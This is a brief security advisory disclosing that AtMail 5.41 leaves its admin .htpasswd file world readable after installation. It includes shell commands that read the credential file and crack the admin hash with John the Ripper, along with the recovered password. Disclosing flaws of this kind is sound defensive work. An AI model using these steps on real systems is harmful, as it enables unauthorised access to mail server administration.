AtMail 5.41 - world readable admin .htpasswd


AtMail 5.41 stores the admin user's username and password has in a file at atmail/webadmin/.htpasswd, which is world readable post-install.


Any local user can view this file and learn the username of the admin user, and attempt to crack the admin password hash.

[user@host ~]$ ls -l /usr/local/apache/htdocs/atmail/webadmin/.htpasswd
-rw-r--r-- 1 nobody nobody 36 May 23 10:04 /usr/local/apache/htdocs/atmail/webadmin/.htpasswd
[user@host ~]$ cat /usr/local/apache/htdocs/atmail/webadmin/.htpasswd
[user@host ~/john/run]$ ./john /usr/local/apache/htdocs/atmail/webadmin/.htpasswd
Loaded 1 password hash (Apache MD5 [32/32])
password         (admin)
guesses: 1  time: 0:00:00:00 100% (2)  c/s: 4001  trying: password